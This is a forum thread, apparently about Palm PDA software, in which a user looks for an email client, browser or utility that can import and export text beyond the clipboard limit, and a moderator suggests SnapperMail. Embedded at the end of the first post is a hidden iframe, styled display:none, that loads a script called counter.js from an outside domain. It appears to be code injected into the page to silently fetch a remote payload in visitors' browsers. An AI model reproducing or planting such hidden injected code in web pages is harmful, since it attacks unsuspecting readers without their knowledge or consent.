+ Reply to Thread

Email/browser that can import/export large text

I've been using and loving Eudora and Eu Web for a couple of years now -- they're simple, fast, reliable.

One problem: I have no good way to import/export a lot of text, in excess of native Clipboard limit.

If I get a bigger piece of text in an email message or browser screen, I have no good way to save it -- even to Memo(s), let alone an editable DOC file. Likewise if I write a story in miniWrite or QED, I can't easily stick it into an email or Web-based form.

Anyone have a recommendation for:

1. An email client that handles this problem well (not via attachments), especially that can read/write to DOC?

2. A browser that can import/export in chunks bigger than the Clipboard? It would probably have something like a "Paste from..." or "Save to..." menu item.

3. A utility that reliably copies/pastes large chunks of text?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Have you checked out SnapperMail? I don't think it does all that, but may be worth a look.
    ~'kito
    pdaPhoneHome Moderator

Markito, thanks. I haven't tried it. Looks very big and complicated, and I'm finding life is short for trying every new big thing that comes along. I would if someone said it does what I'm looking for.